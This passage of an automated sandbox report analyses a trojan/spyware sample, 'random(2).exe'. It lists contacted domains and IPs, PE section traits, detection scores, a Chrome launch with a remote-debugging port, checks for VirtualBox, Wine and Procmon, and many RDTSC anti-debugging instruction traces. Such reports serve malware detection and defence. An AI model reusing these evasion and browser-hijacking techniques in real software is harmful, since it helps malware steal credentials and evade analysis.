              Source: random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk//
              Source: random(2).exe, 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/5
              Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/G
              Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/a
              Source: random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/j
              Source: random(2).exe, 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/m
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukK
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukZ
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukb
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukg
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukq
              Source: random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.ukv
              Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49681 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.10:49682 version: TLS 1.2

              System Summary

              Source: random(2).exe Static PE information: section name:
              Source: random(2).exe Static PE information: section name: .idata
              Source: random(2).exe Static PE information: section name:
              Source: C:\Users\user\Desktop\random(2).exe Process Stats: CPU usage > 49%
              Source: random(2).exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: random(2).exe Static PE information: Section: ZLIB complexity 0.9982289459745762
              Source: random(2).exe Static PE information: Section: xyhrtgkn ZLIB complexity 0.9948176319648094
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@34/1@4/4
              Source: C:\Users\user\Desktop\random(2).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\F0CK4TZV.htm
              Source: C:\Users\user\Desktop\random(2).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: random(2).exe Virustotal: Detection: 50%
              Source: random(2).exe ReversingLabs: Detection: 58%
              Source: unknown Process created: C:\Users\user\Desktop\random(2).exe "C:\Users\user\Desktop\random(2).exe"
              Source: C:\Users\user\Desktop\random(2).exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3
              Source: C:\Users\user\Desktop\random(2).exe Process created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: dbghelp.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\random(2).exe Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\random(2).exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: random(2).exe Static file information: File size 1822720 > 1048576
              Source: random(2).exe Static PE information: Raw size of xyhrtgkn is bigger than: 0x100000 < 0x1aa400
              Source: initial sample Static PE information: section where entry point is pointing to: .taggant
              Source: random(2).exe Static PE information: real checksum: 0x1bd743 should be: 0x1be5cf
              Source: random(2).exe Static PE information: section name:
              Source: random(2).exe Static PE information: section name: .idata
              Source: random(2).exe Static PE information: section name:
              Source: random(2).exe Static PE information: section name: xyhrtgkn
              Source: random(2).exe Static PE information: section name: atwyfmcm
              Source: random(2).exe Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\random(2).exe Code function: 0_3_0493DFF7 push ecx; iretd 0_3_0493E074
              Source: C:\Users\user\Desktop\random(2).exe Code function: 0_3_04931521 push eax; iretd 0_3_04931525
              Source: random(2).exe Static PE information: section name: entropy: 7.97802160630939
              Source: random(2).exe Static PE information: section name: xyhrtgkn entropy: 7.955289387133198

              Boot Survival

              Source: C:\Users\user\Desktop\random(2).exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\random(2).exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\random(2).exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\random(2).exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\random(2).exe Window searched: window name: Filemonclass

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\random(2).exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\random(2).exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEC8D second address: 5DECA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F2944535540h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEE4E second address: 5DEE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jno 00007F29453582D6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DEE5F second address: 5DEE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF3ED second address: 5DF3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF3F2 second address: 5DF40F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535547h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5DF40F second address: 5DF41E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E1830 second address: 5E183A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E183A second address: 5E1857 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29453582DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jo 00007F29453582D6h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E19C6 second address: 5E19CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E22F0 second address: 5E2356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F29453582D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jl 00007F29453582E3h 0x0000002a pushad 0x0000002b jno 00007F29453582D6h 0x00000031 mov edi, 773FC64Fh 0x00000036 popad 0x00000037 nop 0x00000038 jmp 00007F29453582E2h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F29453582E5h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2356 second address: 5E235B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E280D second address: 5E2811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2811 second address: 5E281D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E281D second address: 5E2835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b nop 0x0000000c and esi, 291A9FCAh 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2835 second address: 5E2839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E2D71 second address: 5E2D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E358A second address: 5E358E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E481C second address: 5E4822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5203 second address: 5E5209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5209 second address: 5E5222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E529E second address: 5E52A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E52A2 second address: 5E52B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F29453582D6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5B2E second address: 5E5B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E5B34 second address: 5E5B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E68AD second address: 5E68B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E6645 second address: 5E6649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E6649 second address: 5E664F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7DAC second address: 5E7DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 jng 00007F29453582DCh 0x0000000c mov dword ptr [ebp+122D17A4h], ecx 0x00000012 push 00000000h 0x00000014 jmp 00007F29453582E6h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D1A1Ch], ebx 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7DE5 second address: 5E7DEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7DEB second address: 5E7E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F29453582E9h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E9891 second address: 5E9895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E9895 second address: 5E989F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E989F second address: 5E98A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2944535536h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E98A9 second address: 5E98AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EAE92 second address: 5EAE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ED0B1 second address: 5ED0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EE241 second address: 5EE245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EF092 second address: 5EF0A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7B60 second address: 5E7B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5E7B67 second address: 5E7B71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F29453582DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F01C2 second address: 5F01C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EB02D second address: 5EB031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EB031 second address: 5EB037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EC14F second address: 5EC173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29453582DAh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EC173 second address: 5EC179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F42B6 second address: 5F42BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F42BA second address: 5F42C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F42C0 second address: 5F4331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F29453582D8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 or bx, CEE5h 0x00000029 push 00000000h 0x0000002b mov di, BF00h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F29453582D8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov ebx, dword ptr [ebp+122D377Eh] 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EE4A9 second address: 5EE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5EE4AD second address: 5EE4B7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ED1FF second address: 5ED21B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5ED21B second address: 5ED21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F5142 second address: 5F515B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535545h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F12CF second address: 5F12DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F29453582D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F60F4 second address: 5F60F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F60F8 second address: 5F6151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F29453582D8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov bx, C51Ah 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F29453582D8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 xor dword ptr [ebp+122D31B8h], eax 0x0000004c cld 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F228E second address: 5F2298 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F2298 second address: 5F22C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F29453582EFh 0x00000010 jmp 00007F29453582E9h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F719E second address: 5F71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F71A3 second address: 5F71D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F29453582E2h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F29453582E6h 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F52C4 second address: 5F52F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007F2944535546h 0x00000019 pop edi 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53A4 second address: 5F53B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53B2 second address: 5F53B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53B6 second address: 5F53D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007F29453582E4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F53D3 second address: 5F53D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
